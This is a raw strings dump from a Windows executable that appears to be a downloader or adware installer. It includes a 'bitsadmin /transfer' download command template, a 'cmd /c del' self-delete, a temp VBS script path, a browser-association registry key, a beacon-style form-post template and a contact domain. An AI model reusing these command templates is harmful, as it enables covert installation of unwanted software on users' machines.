type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />
stdole2.tlb
msg
keyName
url
url2
cmdLine
CreateIcon
iconUrl
regKey
CheckRegKey
key
launchCommandLine
cmd
IsShortNameInstalled
Created by MIDL version 7.00.0555 at Mon Jul 18 19:01:37 2016
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
KERNEL32.DLL
ADVAPI32.DLL
USER32.DLL
Winhttp.dll
Content-Type: application/x-www-form-urlencoded
shlwapi.dll
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
appimageurl
cmdl
capp=%s&cid=%s&mhx=%S&base=%s
\bitsadmin.exe
\Support Tools\bitsadmin.exe
:?*\"'/.
%sami%s%d%d.exe
%d-%.2d-%.2dT%.2d:%.2d:00
%d-%.2d-%.2dT%.2d:-:00
/retrynav %d
Advapi32.dll
shell32.dll
{23A96663-59D1-4C44-A0DB-1118D9C4ABBA}
OLEAUT32.DLL
kernel32.dll
sn=%s&hx=%S&base=%s
rfsw%d
advapi32.dll
v2.0.50727
v1.1.4322
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
%ProgramW6432%\Microsoft Silverlight\sllauncher.exe
%ProgramFiles%\Mozilla Firefox\firefox.exe
ami%sExd
bitsadmin /transfer amijob /download /priority high %s %s
ami%sExi
/c del "%s"
cmd.exe
%TEMP%\task.vbs
ami%sExdel
%%X
version.dll
OleAut32.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup7849__99999_il2.exe
{8856F961-340A-11D0-A96B-00C04FD705A2}
1.1.5.26
setup.exe
smaltinecdcf.site